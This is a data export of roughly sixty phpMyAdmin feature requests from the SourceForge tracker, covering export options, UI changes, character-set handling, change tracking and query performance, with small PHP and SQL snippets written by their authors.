Thanks Chris Original URL https sourceforge.net p phpmyadmin feature requests 1134 https sourceforge.net p phpmyadmin feature requests 1134 Original author chrismerten","enhancement"
"24444","5833","Tell PMA that it is running on https.
I m running phpMyAdmin on a backend server on port 80, http ), but the frontent is https and I ve configured cfg[ PmaAbsoluteUri ] to the https URL.
However, isHttp ) will return false, since the server itself is http only and the result is that PMA redirects to the http URL after login unless I configure ForceSSL=1, which causes an infinite redirect loop.
I d like to have a method to tell PMA that it is running on https really.
My hack looks as follows in isHttps I ve added the following at the beginning if defined PMA IS HTTPS ) ) \{ return PMA IS HTTPS; \} and in config.inc.php define PMA IS HTTPS , true); Original URL https sourceforge.net p phpmyadmin feature requests 1135 https sourceforge.net p phpmyadmin feature requests 1135 Original author blueyed","enhancement"
"24444","5834","Escape new line in CSV export.
Many external external tools stop importing CSV files as soon as a CRLF Carriage return Linefeed) is signalled within the field value.
Unfortonately this even happens when field and row delimiters are not set to CRLF.
The default Fields escape in the export section does not escape these in value CRLF characters.
Result the generated CSV file is not imported.
I would like to have an option that in value CR LF values are escaped, replaced with something different or just removed, to be able to import the generated CSV file.
Original URL https sourceforge.net p phpmyadmin feature requests 1136 https sourceforge.net p phpmyadmin feature requests 1136 Original author cj0","enhancement"
"24444","5835","Warn users when entering a high value in Show ... row s).
When dummy users like me) would like to view row 158.300 in a table.
And by accident don t read the labels) fill in that large value out to field session max rows , phpmyadmin becomes unresponsible in browse mode.
Imprevement could be to warn the user that this taking a long time and might possible result in no results at all, do you want to start viewing from record 158.300?
And when pressing ok enter, move the filled out value to pos and restore the previous session max rows value.
Original URL https sourceforge.net p phpmyadmin feature requests 1137 https sourceforge.net p phpmyadmin feature requests 1137 Original author cj0","enhancement"
"24444","5836","export timestamps normalized to UTC.
I am using phpMyAdmin 2.11.8.1 and when I export data from a table containing a TIMESTAMP column, the values in the output are the same as the ones shown by the Browse view.
That is, they re auto adjusted by the MySQL server via the time zone server session option.
This has a consequence when using phpmyadmin to export data for migration across different timezones the times would all get messed up.
Potential solutions adjust from system to UTC before exporting, adjust from UTC to system before importing or place a SET time zone=... query at the beginning of the exported output can be tricky if the server s timezone is SYSTEM) Original URL https sourceforge.net p phpmyadmin feature requests 1138 https sourceforge.net p phpmyadmin feature requests 1138 Original author theultramage","enhancement"
"24444","5837","Remove Shell scripts from lang folder.
Hi, I think it would be nice if possible) to move the shell scripts .sh) files from the lang folder to another or a sub folder.
That would make it much easier for everybody to delete the unneeded languages before transferring the program to your server.
I usually just need two languages and therefor can save about 6MB by removing the unneeded languages before uploading the files to my server.
But while deleting the unwanted php files I have to watch out, not to delete one of the .sh files.
So if they could be moved into another folder it I could jsut select all files and deselect the language files I need on my server and delete all other remaining files.
Kind regards Maik Wiege Original URL https sourceforge.net p phpmyadmin feature requests 1139 https sourceforge.net p phpmyadmin feature requests 1139 Original author mswiege","enhancement"
"24444","5838","Change Tracking.
I think the following new feature could be an incredibly useful addition for software developers.
Typically, through the course of developing an application or website, table structures undergo various changes from generation 1 to generation 2, etc.
What most developers do including phpMyAdmin developers), is they try to manually describe the differences between generation 1 and generation 2 of a table, and create upgrade scripts typically just SQL statements that upgrade tables by ALTERing them as needed.
What I would like to see, is a version management feature that could help with this.
This would require a new table for tracking changes CREATE TABLE IF NOT EXISTS `pma tracking` `db name` varchar 64) collate utf8 bin NOT NULL, `table name` varchar 64) collate utf8 bin NOT NULL, `version` int 10) unsigned NOT NULL, `date created` datetime NOT NULL, `date updated` datetime NOT NULL, `snapshot` text collate utf8 bin NOT NULL, `create sql` text collate utf8 bin, `update sql` text collate utf8 bin, `exported` tinyint 1) NOT NULL default 0 , `date exported` datetime default NULL, `tracking` set UPDATE , REPLACE , INSERT , DELETE , TRUNCATE , CREATE DATABASE , ALTER DATABASE , DROP DATABASE , CREATE TABLE , ALTER TABLE , RENAME TABLE , DROP TABLE , CREATE INDEX , DROP INDEX , CREATE VIEW , ALTER VIEW , DROP VIEW ) collate utf8 bin default NULL, PRIMARY KEY `db name`,`table name`,`version`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8 bin ROW FORMAT=COMPACT; It could work something like this On the Structure tab, at the bottom next to Print view , Relation view , etc.)
add a new button Track Changes .
This takes you to a page with an overview of all recorded versions of the table this is initially empty, so to create version 1 , you have to click on a Create Version 1 button.
the Track Changes page has a dropdown that enables you to switch to other tables color coding of the table names indicates whether tracking information exists, and wether tracking is active) The current table structure is inserted into the pma tracking table with `version`=1 and `create sql` filled with a complete CREATE TABLE statement.
The results of SHOW FULL COLUMNS FROM and SHOW INDEX FROM is stored as a serialized array in the `snapshot` column.
Now, before you start making changes and developing version 2 of your table, you click on the Create Version 2 button on the tracking page.
A form appears, with options to decide which statements you wish to record for version 2 Record Version 2 of `database`.`table` [ ] Record Data Manipulation Queries [ ] UPDATE [ ] REPLACE [ ] INSERT [ ] DELETE [ ] TRUNCATE [x] Record Data Definition Queries [x] Database [x] ALTER DATABASE [x] DROP DATABASE [x] Tables [x] CREATE TABLE [x] ALTER TABLE [x] RENAME TABLE [x] DROP TABLE [x] Indexes [x] CREATE INDEX [x] DROP INDEX [x] Views [x] CREATE VIEW [x] ALTER VIEW [x] DROP VIEW Upon starting version 2 and later versions), the record is created right away.
The `snapshot` column is populated, and compared to that of the previous version if any untracked changes to columns or indexes are detected, ADD ALTER DROP COLUMN and ADD ALTER DROP INDEX queries are generated and added to the `update sql` column of the new tracking record, along with a comment stating why and when these queries were generated.
The user is returned to the Structure view of the table.
Change tracking is now enabled, and queries of the selected types are recorded into the `update sql` column.
While tracking is enabled, a notice appears on every page related to the tracked table, indicating that recording is on and a link to turn off change tracking is displayed.
Once the user has completed the changes, tracking can be turned off, and you can return to the Change Tracking page to compile and export tracked changes.
When no tables are currently being tracked, the Change Tracking page will display a link otherwise a notice), allowing the user to go to the Compile And Export form.
The `exported` field in a tracking record indicates whether tracked changes have been compiled and exported yet.
On the compile and export form, you check off the tables or whole database s) for which you wish to compile and export changes.
By default, all tables with changes that have not yet been exported, will be checked.
You also have dropdowns to manually set the from and to version numbers for each table these are set by default to the last exported version from), and the latest newer version to).
You have two buttons to submit this form Export and Preview in preview mode, no changes to version records are made; otherwise, exported tracking records are flagged as `exported`.
Initially, the Export button is disabled, forcing the user to always preview at least once, before flagging changes as exported, and a confirmation dialog is displayed when you hit Export this ensures that you don t accidentally flag your changes prematurely.
The output consists of two SQL scripts displayed in two textareas).
1\.
The upgrade script, which consists of all the `update sql` statements of the relevant change records, compiled into one, with comments inserted to indicate where tables and versions begin.
Upgrade scripts will contain a warning comment at the top, telling you to backup your tables before attempting an upgrade.
2\.
The install script, which consists of all the `create sql` statements from the latest version of each table s change records, compiled into one, with comments indicating where tables begin, and what version number was exported.
Install scripts for any tables with `version` gt; 1, will contain a warning comment at the top, telling you that any existing tables from a previous version will be dropped on install.
An advanced user who needs to recover from accidental flagging, can use the `date ` columns to determine which records to unflag `date created` is set when a change record is initially created, and `date updated` is set whenever a query is appended to the `update sql` field.
The `date exported` field is set to the exact same date and time for all exported changes, meaning you can also SELECT and or GROUP BY on this field, to see which changes were part of the same operation.
At it s simplest, this system can be used to create upgrade scripts, by simply adding a new version before and after table structures are altered.
Better still, by recording your changes, you can take into account UPDATEs, temporary tables, etc., which may be required to convert from one version of a table structure to another.
Original URL https sourceforge.net p phpmyadmin feature requests 1140 https sourceforge.net p phpmyadmin feature requests 1140 Original author mindplay","enhancement"
"24444","5839","Optional LIMIT.
When i browse a mysql database the LIMIT feature does more bad than good since i always have to extend the limit.
How would it to simply prompt the user if there should be a limit ONLY if the table is over, say 100 rows ?
This would of course be optional and settable in conf file.
If this feature is already in there, sorry ) Original URL https sourceforge.net p phpmyadmin feature requests 1141 https sourceforge.net p phpmyadmin feature requests 1141 Original author aetherous","enhancement"
"24444","5840","Table interface improvements.
I was creating a website with 2 3 projects init.
After finishing this my database was full with lots of tables.
And i was thinking is it possible to create something like a tree menu in the tables because its easier to find everything when your database is full with tables and you dont have the premission to create more then 1 database.
example = Folder = table in the folder until next ) ) = possible a automatic insert when you create a table Projectname1 Projectname1 )table1 Projectname1 )table2 Projectname1 )table3 Projectname2 Projectname2 )table1 Projectname2 )table2 Projectname2 )table3 Projectname2 )table4 Projectname2 )table5 Projectname3 Projectname3 )table1 Projectname3 )table2 Projectname3 )table3 sorry if my english is bad Original URL https sourceforge.net p phpmyadmin feature requests 1142 https sourceforge.net p phpmyadmin feature requests 1142 Original author blackpol","enhancement"
"24444","5841","Automatically drops primary key if you add a new one.
If you add a primary key in the structure tab, it does drop primary key, add ...
I m not sure I prefer an existing primary key to be dropped automatically compared to getting an error.
Original URL https sourceforge.net p phpmyadmin feature requests 1143 https sourceforge.net p phpmyadmin feature requests 1143 Original author olafvdspek","enhancement"
"24444","5842","Add Field issues.
If I add a field and type in the default box, the default type isn t automatically switched to As defined .
If I m at the add field page and click on add another) field, it defaults to As defined instead of the normal default of None .
I think auto increment should not be written as just A I.
Original URL https sourceforge.net p phpmyadmin feature requests 1144 https sourceforge.net p phpmyadmin feature requests 1144 Original author olafvdspek","enhancement"
"24444","5843","Preview SQL instead of executing it..
I use PMA to write a lot of queries for me, and by that I mean i will use PMA to build a table, then copy the SQL to another insall of PMA on a production server, and execute it there.
Other times I might want to change a column type, or change a column s collation keys or something of the like which might take several minutes [I have large tables] and the page times out.
Usually PMA will display the SQL it executed afterwards, except on very long queries and pages which time out, so I d love to have a checkbox that says, Preview SQL before PMA executes the query.
This would only apply to queries which PMA helps automate for us [like building tables, index tweaks, column changes].
Sometimes I don t want to run the SQL, just have PMA spit it out for me so I can batch it at a later time ) Original URL https sourceforge.net p phpmyadmin feature requests 1145 https sourceforge.net p phpmyadmin feature requests 1145 Original author pureform","enhancement"
"24444","5844","Show original size of truncated columns.
Say there is a giant item somewhere in our database.
One can only see the size of each table, but looking inside a table, one cannot configure to see sizes, at most one can only configure to see the whole item, but not just its size.
Original URL https sourceforge.net p phpmyadmin feature requests 1146 https sourceforge.net p phpmyadmin feature requests 1146 Original author jidanni","enhancement"
"24444","5845","Export supporting stored procedures.
Release 3.1.2 allows editing of stored functions and procedures.
However, the Export function does not take these into account.
It would be nice that the Export function could optionally?)
dump stored functions and procedures.
Original URL https sourceforge.net p phpmyadmin feature requests 1147 https sourceforge.net p phpmyadmin feature requests 1147 Original author bkuik","enhancement"
"24444","5846","Extra warning on drop db.
Dropped a db by accident.
Selected three tables to drop using checkboxes, then instead of using dropdown clicked drop at top of page and okay.
An extra warning, some flashing lights, or disabling the drop feature by default would be nice.
Two clicks to drop a db is just too easy.
Original URL https sourceforge.net p phpmyadmin feature requests 1148 https sourceforge.net p phpmyadmin feature requests 1148 Original author raveller","enhancement"
"24444","5847","Make INSERT IGNORE an export type.
The export menu supports 3 kinds of exports, INSERT, REPLACE and UPDATE, while INSERT IGNORE can be chosen by using a checkbox.
But its more logical and clean to show INSERT INTO as an export type with the same menu as INSERT, REPLACE and UPDATE.
Original URL https sourceforge.net p phpmyadmin feature requests 1149 https sourceforge.net p phpmyadmin feature requests 1149 Original author konghara1d","enhancement"
"24444","5848","Easy Backup Restore.
This whole process should be made more intuitive.
Basically, we are talking about simple, standard database usage, and for this process to be fraught with problems makes the use of some sort of admin GUI not as usable as it should be.
Image the situation as I experienced.
With decades of usage experience, I was totally a newbie in how to properly handle the export of my web site cms database from my old host to the import on my new host.
There are issues that may have to do with passwords and users, with database table format changes, and what have you.
So much is unknown, and too many times the user is left to trying to figure out some cryptic error message from MySQL.
Any admin interface should have taken care of that, and yet we find that phpMyAdmin is not as intuitive as it should be.
This export import process needs to be made automated and goof proof.
It offers too many confusing and non basic options.
Perhaps a simple wizard would be the most useful.
The program need to be tuned up with less geek speak, and particularly in any wizard design.
That s my two cents worth.
Thanks for the fine efforts.
Original URL https sourceforge.net p phpmyadmin feature requests 1150 https sourceforge.net p phpmyadmin feature requests 1150 Original author techfrc","enhancement"
"24444","5849","Automatically copy generated password.
Is there a need for separate generate and copy buttons for passwords?
Why doesn t generate also copy the password?
Original URL https sourceforge.net p phpmyadmin feature requests 1151 https sourceforge.net p phpmyadmin feature requests 1151 Original author olafvdspek","enhancement"
"24444","5850","Display searchable database list.
Hello!
I am using phpMyAdmin on a system with an important number of databes above 2.000 databases).
The system itself for a small number of databases is great, but when you start to have dozen of pages, picking up the right database is a pain in the ass if you excuse me for the expression.
I often have to browse 4 or 5 pages, and then in the page double check to be sure not to click on the wrong database name.
Instead of a combobox, it would be really nice to have an input like google suggest who would populate results based on a search.
Or any other way of selecting a base through a search.
Thanks for reading!
Original URL https sourceforge.net p phpmyadmin feature requests 1152 https sourceforge.net p phpmyadmin feature requests 1152 Original author sbuysse","enhancement"
"24444","5851","Please no more popup window for SQL queries!!!!.
Hi there.
Thanks for all your hard work.
One thing about phpMyAdmin drives me mad though it s the sql popup window.
can we get rid of it?
I d rather you split the RHS panel into frames yes, frames) than having to constantly cycles through my browser window to find out where the SQL query has disappeared to.
Ideally though, the SQL query box would appear disappear gracefully with DHTML, like what happens when you click on the triangle on the O2 website.
http o2.co.uk Thanks Original URL https sourceforge.net p phpmyadmin feature requests 1154 https sourceforge.net p phpmyadmin feature requests 1154 Original author gotofritz","enhancement"
"24444","5852","Export Records and Relations.
The ability to choose to export a set of records and all related records based on the relations defined in phpMyAdmin.
Use Case I would like to move a customer from 1 database to another database.
I need to export their account record, and also any campaigns referencing that account and also any groups referencing that campaign and so on.
Ideally it would be a top down export that let s me choose the account record and then looks for all references to that account record and does so recursively down the tree.
It would use the relations I have already defined in phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin feature requests 1153 https sourceforge.net p phpmyadmin feature requests 1153 Original author smartinec","enhancement"
"24444","5853","rename multiple tables.
A few weeks ago I had to rename multiple tables, replacing a mutual prefix to another prefix.
I looked for a function in phpMyAdmin to do this, couldn t find it, and finally ended up writing a small php script to rename some tables with an identical pattern prefix, suffix, ...).
Renaming multiple tables might be a useful feature for phpMyAdmin.
example script http ruleant.blogspot.com 2009 03 rename multiple tables in mysql.html ) If you think it is a useful feature, I would like to give it a try to implement it in phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin feature requests 1155 https sourceforge.net p phpmyadmin feature requests 1155 Original author ruleant","enhancement"
"24444","5854","configurable URL length limit in PMA linkOrButton.
quote from source previously the limit was set to 2047, it seems 1000 is better Well, 1000 might be better or it might not, why not have int) cfg[ PmaLinkOrButtonLimit ] with 1000 or 2047, if you like) as default?
Some phpmyadmin installations are just for one person having a most liked browser.
These person would know, or could just try out, which ist the best limit.
Buttons are just inconvinient, since thy dont allow neither open in new window nor copy link url to clipboard .
If one would actually LIKE buttons they at least look better) one could set cfg[ PmaLinkOrButtonLimit ] to zero.
Original URL https sourceforge.net p phpmyadmin feature requests 1156 https sourceforge.net p phpmyadmin feature requests 1156 Original author nullbarriere","enhancement"
"24444","5855","Export tables preselect.
It would be handy, if you could mark some tables in the structure view and just select export in the select box at the bottom of the table view right from selecet all unselect all).
After this, the view changes to export and all selected tables will be preselected.
Also the table select box in export view is to small.
6 rows are not well arranged when you have about 80 tables in the database.
Just remove all the lt;br gt; between the radiobuttons and there will be enough room for 10 or 12 lines.
Original URL https sourceforge.net p phpmyadmin feature requests 1157 https sourceforge.net p phpmyadmin feature requests 1157 Original author robert siton","enhancement"
"24444","5856","Numbering of rows.
It would be great if there were a way to display a count of the rows when browsing or display search results.
The numbering should start with 0, to correspond with the array numbers when working in PHP with database results.
Original URL https sourceforge.net p phpmyadmin feature requests 1158 https sourceforge.net p phpmyadmin feature requests 1158 Original author web maestro","enhancement"
"24444","5857","Number of fields on the structure page.
Tables may have a huge number of fields.
This information is sometimes quite useful and there s no way to easily find it right now.
Changes to improve that point are quite easy and they could be implemented in juste a few minutes with the use of the already existing fields cnt variable.
Here are my proposals display this number in the header of the table structure between parenthesis.
Ex Fields 42) in tbl structure.php lt;th id= th lt;?php echo i; ?
gt; gt; lt;?php echo strField.
.
fields cnt. )
?
gt; lt; th gt; or and display this count number in the statistics table, at the bottom of the page Original URL https sourceforge.net p phpmyadmin feature requests 1159 Original author delapouite","enhancement"
"24444","5858","pmadb config error.
phpMyAdmin 3.1.2, php 5.2.8, apache 2.2.11on FreeBSD 7.2 RELEASE) I wish to help someone avoid the 3 hours I just spent [silly me].
Basically, I upgraded phpMyAdmin.
In reality, I copied all the databases from an old machine to a new one with a more recent version of phpMyAdmin.
Nonetheless.
The pmadb was missing pma designer coord.
And it was reported as a missing feature.
In attempts to fix the missing feature none of which appeared to work) I added the line in config.inc.php I added the table with the SQL tab on phpMyAdmin with a copy paste from the create tables.sql file.
I deleted the whole pmadb database and recreated it from the script.
I restarted the server.
I started tracing the code really nicely written by the way; but dense...) I grepped for Displaying Column Comments and found it in lang english utf8.inc.php I grepped for strColComFeat and found it in .... blah blah blah on into stubborn debug mode ultimately, I finally deleted my cookies.
Ta Dah!
Could you please add a bit of text to PMA printRelationsParamDiagnostic ) to the effect of after making changes, please clear your cookies...
Thanks.
btw phpMyAdmin rocks.
Thank you very much.
Original URL https sourceforge.net p phpmyadmin feature requests 1160 Original author ericxb","enhancement"
"24444","5859","XHTML elements id and class consistency.
Names of XHTML elements id and class attributes are not consistent.
e.g.
submit `Go has id input go , buttonGo and in the most places id or class is not defined at all.
Same goes for fieldsets.
Improvements would be great for better theming control.
Original URL https sourceforge.net p phpmyadmin feature requests 1161 Original author audriu5","enhancement"
"24444","5860","on SQL import, add an ignore errors option.
Hi, it would be great if there was on import functionnality, a checkbox to indicate to ignore or not sql error example foreign key error).
For example, with 100 sql statements, 95 would execute great and the last 5 would return foreign key error, but phpmyadmin in this case wouldn t cancel all statements ..
Original URL https sourceforge.net p phpmyadmin feature requests 1162 Original author therebel22","enhancement"
"24444","5861","PMA not using SET NAMES on Custom Collation Charset.
Hello all, A quick thank you for all the awesome work on this project throughout the years ) I was having issues exporting data from one machine to another via PMA, UTF 8 chars were turning to ???
and whatnot.
I did some poking around and found that only a few of the character set variables were being set, and character set results in particular wasn t changing at all [it was stuck as utf8 even though my collation was latin1], no matter which collation charset I set PMA to.
My website connects using latin1, for backwards compatibility, so I use SET NAMES latin1 PMA doesn t use SET NAMES when a user collation is specified, only when the user has not specified a collation... maybe it should?
I changed .
libraries database interface.lib.php line 853 to PMA DBI query SET CHARACTER SET utf8 ; , link, PMA DBI QUERY STORE); mysql charset = explode , GLOBALS[ collation connection ]); PMA DBI query SET collation connection = .
PMA sqlAddslashes GLOBALS[ collation connection ]) .
; , link, PMA DBI QUERY STORE); mysql charset = explode , GLOBALS[ collation connection ]); PMA DBI query SET NAMES .
mysql charset[0] .
COLLATE .
GLOBALS[ collation connection ] .
; , link, PMA DBI QUERY STORE); ... and it worked like a charm ) I understand this is for the CONNECTION collation, but maybe there should be a better way to control all the character set charsets collations, like through through SET NAMES.
Original URL https sourceforge.net p phpmyadmin feature requests 1163 Original author pureform","enhancement"
"24444","5862","Use inline query editing.
After executing a query, the Edit button opens a new window.
Would it be possible to do the editing in place?
For example, by using a textarea to display the query?
Original URL https sourceforge.net p phpmyadmin feature requests 1164 Original author olafvdspek","enhancement"
"24444","5863","compount field to display.
i need a possibility to define compount title in Relation view so i can use hover info in SQL result where there is compound row name in the table.
for ex a table has columns table name and row id.
So i need both values to get proper hover info in SQL result browser.
It should display as somethis like this value1|value2 Original URL https sourceforge.net p phpmyadmin feature requests 1165 Original author freeman3","enhancement"
"24444","5864","Please no more popup window for SQL queries!!!!.
Hi there.
Thanks for all your hard work.
One thing about phpMyAdmin drives me mad it s the sql popup window WHICH APPEARS AFTER YOU CLICK ON THE SQL TAB, RUN THE QUERY, AND THEN CLICK EDIT .
Can we get rid of it?
Clicking EDIT should replace the SQL query on the page with an editable textarea, not a popup window which means I constantly have to cycle through my browser windows to find out where the SQL query has disappeared to.
To ibennetch and lem9 who commented on the original thread clicking on the SQL tab works only the first time round, after that if you click on EDIT it will launch a popup window at least on Firefox on OSX,) Thanks P.S Someone closed the comments on the original thread without understanding the problem or explaining why how rude.
http sourceforge.net tracker ?func=detail atid=377411 aid=2692299 group id=23067 Original URL https sourceforge.net p phpmyadmin feature requests 1166 Original author gotofritz","enhancement"
"24444","5865","Table status sorting default order.
For records, size and overhead, larger values are more interesting than smaller ones.
Maybe it s a good idea to reverse the default order, such that those are on top after clicking one time and on bottom after two).
Original URL https sourceforge.net p phpmyadmin feature requests 1167 Original author olafvdspek","enhancement"
"24444","5866","Remove support for 4.0 compatible passwords.
The Edit User page still supports 4.0 compatibel passwords.
Maybe it s a good idea to remove that.
Original URL https sourceforge.net p phpmyadmin feature requests 1168 Original author olafvdspek","enhancement"
"24444","5867","Increase default height of query window.
The query window on the SQL tab is tiny 7).
Could you increase the height?
Especially when there s nothing else to display.
Original URL https sourceforge.net p phpmyadmin feature requests 1172 Original author olafvdspek","enhancement"
"24444","5868","comment removed from query > no comment in db function proc.
when typing a sql query, comment are removed when phpMyAdmin perform the query.
this is anoying for trigger, function and procedure, in wich comment permit to better understand how it work.
personnaly comment i use are , I haven t tested other comment.
It is the same when importing a .sql file, it remove comment.
see the attached file to create a function with a comment you may have to change user and host to create the function).
Original URL https sourceforge.net p phpmyadmin feature requests 1174 Original author jforrier","enhancement"
"24444","5869","Support for FileMaker Exporting..
I would like to request the implementation of a feature that allows users to export their databases to FileMaker.
I know that FileMaker is proprietary software and as everything new, this request will encounter some difficulties.
But if it might be possible to do this, it would be great!.
Thanks.
Original URL https sourceforge.net p phpmyadmin feature requests 1169 Original author danielperaza","enhancement"
"24444","5870","add REGEXP ... underneath LIKE ... ,.
in the SQL search tab, you already have LIKE ... as one of the options, there would be useful to have also REGEXP ... cause most of the time, if you search something, you need the whole string.
Also this would explain a bit already to the user how to use REGEXP Original URL https sourceforge.net p phpmyadmin feature requests 1170 Original author rubo77","enhancement"
"24444","5871","use standard BOOLEAN data type.
Relates to https sourceforge.net tracker index.php?func=detail aid=1177459 group id=23067 atid=377411 The BOOL keyword is secondary to BOOLEAN.
BOOLEAN is the primary keyword.
BOOLEAN is standard SQL, BOOL is not.
I know of no other DBMS that uses BOOL as a type.
Please change BOOL to BOOLEAN on any occurrence.
PS I couldn t figure out the right category.
Original URL https sourceforge.net p phpmyadmin feature requests 1171 Original author kwutzke2","enhancement"
"24444","5872","Show inserted UUID.
When inserting a row containing an AUTO INCREMENT column, the value of the LAST INSERT ID ) is shown.
PMA mimics the AUTO INCREMENT functionality on tables whose primary key is CHAR 36), by inserting UUID ) into the column.
INSERT INTO `test`.`foo` `foo uuid` , `foo data` ) VALUES UUID ) , 123 ); This doesn t show the value that was inserted.
Since this is the primary key, we may have no other way to identify this row, and we may need it to maintain foreign keys, etc.
One way to achieve this would be for PMA to generate a UUID ) internally and then insert a literal string.
e.g.
SELECT UUID ); returns 3bd208f2 c54a 102c bd9f d5b50e269472 INSERT INTO `test`.`foo` `foo uuid` , `foo data` ) VALUES 3bd208f2 c54a 102c bd9f d5b50e269472 , 123 ); Original URL https sourceforge.net p phpmyadmin feature requests 1173 Original author fisharebest","enhancement"
"24444","5873","replace footnote symbol.
This is really minor but annoys me for a while now.
When displaying result in InnoDB, PMA will display Showing rows 0 1 2 1 total,...) with the 1 referring to a footnote.
However, the way it displayed I keep reading it as two to the power of one .
Perhaps this is just me.
However, I think this could be countered trivially by using a non numeric symbol for this, for example an asterisk or the dagger.
Thank you for considering, Original URL https sourceforge.net p phpmyadmin feature requests 1175 Original author kink","enhancement"
"24444","5874","Show a warning if Javascript is not enabled.
The left frame doesn t get updated after you do create database from the main page).
Original URL https sourceforge.net p phpmyadmin feature requests 1176 Original author olafvdspek","enhancement"
"24444","5875","Export to DokuWiki format.
It would be useful to export the Table structure data optional) to DokuWiki syntax format.
Very similar to current Texty!text export option currently implemented.
Very useful for documentation purposes so a user can copy paste into a company internal documentation system based on a dokuwiki.
If anyone want to implement I can provide a sample for Table layout data layout in the format.
MediaWiki can be another popular choice.
Original URL https sourceforge.net p phpmyadmin feature requests 1177 Original author felix9x","enhancement"
"24444","5876","New ROW FORMATs of the Innodb plugin.
The new DYNAMIC COMPRESSED ROW FORMATs introduced with the Innodb Plugin are not shown in Table gt; Operations .
Maybe phpmyadmin could check for the innodb file format status variable, and offer the ROW FORMATs based on that!
You can of course use ALTER TABLE ... right now, but having it in the GUI is the whole point of phpMyAdmin, isn t it ;) Original URL https sourceforge.net p phpmyadmin feature requests 1178 Original author samy delux","enhancement"
"24444","5877","Left navigation ultra light.
When displaying a list of all the tables in the left frame In stead of listing all the databases in the left frame either with a dropdownlist or with links), is it possible to create a link to go to the databaseList view?
see implemented attached example) This has some advantages No request for database names when in left tableList = extra speed).
No extra space in the navigation area just the space of the link in stead of the dropdownlist) No extra clicks when comparing to dropdownlist.
Original URL https sourceforge.net p phpmyadmin feature requests 1184 Original author peter cwm","enhancement"
"24444","5878","Speed up slow triggers by using EVENT OBJECT SCHEMA.
STRATO hosted Server MySQL 5.0.67 log I found another very slow query when pma browsing through the structures, the last query for the triggers [count] = gt; 1 [query] = gt; SELECT TRIGGER SCHEMA, TRIGGER NAME, EVENT MANIPULATION, ACTION TIMING, ACTION STATEMENT, EVENT OBJECT SCHEMA, EVENT OBJECT TABLE FROM information schema.TRIGGERS WHERE TRIGGER SCHEMA= mydbname and EVENT OBJECT TABLE = mytablename ; [time] = gt; 5.757780790329 [trace] = gt; Array [0] = gt; .
libraries database interface.lib.php 1109 PMA DBI try query ) [1] = gt; .
libraries database interface.lib.php 1331 PMA DBI fetch result ) [2] = gt; .
libraries tbl triggers.lib.php 14 PMA DBI get triggers ) [3] = gt; .
tbl structure.php 811 require ) I also found the reason for the slow triggers.
That was changed in pma somewhere between 3.0.0. and 3.2.1 In pma 3.0.0. the function PMA DBI get triggers ) takes less than a second in the same environment.
The implementation in pma 3.0.0 used WHERE EVENT OBJECT SCHEMA= mydbname In pma 3.2.1. the query is built with WHERE TRIGGER SCHEMA= mydbname According to http dev.mysql.com doc refman 5.0 en triggers table.html it should be safe to use both The TRIGGER SCHEMA [...] contain the name of the database in which the trigger occurs [...] [...]every trigger is associated with exactly one table.
The EVENT OBJECT SCHEMA and EVENT OBJECT TABLE columns contain the database in which this table occurs, and the table s name.
So, why not use EVENT OBJECT SCHEMA instead of TRIGGER SCHEMA?
It seems to be much faster on at least one big hoster s servers.
best regards, Markus see also https sourceforge.net forum forum.php?thread id=1889931 forum id=72909 Original URL https sourceforge.net p phpmyadmin feature requests 1179 Original author vogon jelz","enhancement"
"24444","5879","enable VIEW rename.
Server version 5.0.81 community MySQL client version 4.1.22 on my phpMyAdmin 2.11.9.5 seems to support RENAME of VIEWs SQL sample) CREATE VIEW v1 AS SELECT value FROM t1; ALTER TABLE v1 RENAME v2; so can you please add that feature to the interface like we have with normal tables.
http bugs.mysql.com bug.php?id=14959 ) Original URL https sourceforge.net p phpmyadmin feature requests 1186 Original author anonymous","enhancement"
"24444","5880","Make column layout when creating table consistent.
Layout for column information is listed horizontally columns 1 3) when number of columns is below a certain threshold.
Noticeable when creating 3 column tables.
Would be nice to have the layout be consistent for all table creations, with individual columns listed vertically as is done for creation of tables with higher column numbers.
Original URL https sourceforge.net p phpmyadmin feature requests 1180 Original author neromir","enhancement"
"24444","5881","PEAR dataObject.
Would it fit within phpMyAdmin to add PEAR dataObjects http pear.php.net manual en package.database.db dataobject.php) as a potential export option?
Original URL https sourceforge.net p phpmyadmin feature requests 1181 Original author michaels23","enhancement"
"24444","5882","Use Hex WKT for Geometry Export columns.
The database table export facility has an option to export binary data as ascii text Use hexadecimal for BLOB Export type .
A similar feature is needed for geometry columns.
MySQL can convert them to WKT WKB format using AsText ) and AsBinary ).
MySQL can convert the data back using GeomFromText ) and GeomFromWKB ).
Original URL https sourceforge.net p phpmyadmin feature requests 1182 Original author fisharebest","enhancement"
"24444","5883","Order query statistics by desc.
Could you order query statistics by desc, skip rows with 0 and maybe only show top 10 25?
Original URL https sourceforge.net p phpmyadmin feature requests 1183 Original author olafvdspek","enhancement"
"24444","5884","Show foreign key links when browsing InnoDB table.
Currently links to foreign keys are shown only when internal relations are enabled.
However it should be enabled also for InnoDB relations.
When editing table this works as expected.
Original URL https sourceforge.net p phpmyadmin feature requests 1191 Original author nijel","enhancement"
"24444","5885","Insert copy of row.
During data entry, it is a frequent operation to create a row that is very similar to an existing row.
I would like a create copy of row function, which would work like a combination of insert row and edit row .
On a result set, there are edit delete icons.
I would add a third icon for create copy .
This would redirect to the insert record screen same as clicking on insert new row), but the values in the form would be pre filled with the values from the current row.
Obviously, the user would need to edit values to satisfy unique constraints, etc.
before saving.
At present, to achieve this, it is necessary to have two PMA windows open, and copy paste each value.
Original URL https sourceforge.net p phpmyadmin feature requests 1185 Original author fisharebest","enhancement"
"24444","5886","Clearview 3 should be the default theme.
Clearview 3 theme should be the new default theme replacing the traditional original theme.
Icons are much easier to comprehend and add significant usability benefits.
Correct use of borders guides the eyes in the right direction.
The whole UI is much easier on the eyes for everyday use.
After installing Clearview I discovered features I didn t realize have existed before using phpMyAdmin daily for 6 years now).
My productivity using phpMyAdmin have definitely improved.
Original URL https sourceforge.net p phpmyadmin feature requests 1187 Original author anonymous","enhancement"
"24444","5887","Autocomplete.
Please, I would like to request to add a attribute autocomplete= off in the input type password because a McAfee Security Audit Tool claims everytime this is a security role.
Original URL https sourceforge.net p phpmyadmin feature requests 1188 Original author fcmaia","enhancement"
"24444","5888","Use the user info table to store additional user information.
The mysql database comes with a table called user info, which is supposed to be used to store additional user information such as Fullname, Contact information, Email, Description and Icon.
All of which are very useful, especially when you need to create generic accounts for other applications or if you need to log user activity or send mass notices to users using scripts.
There is currently no way other than to code your own interface) to easily see and manage this data using PHPMyAdmin.
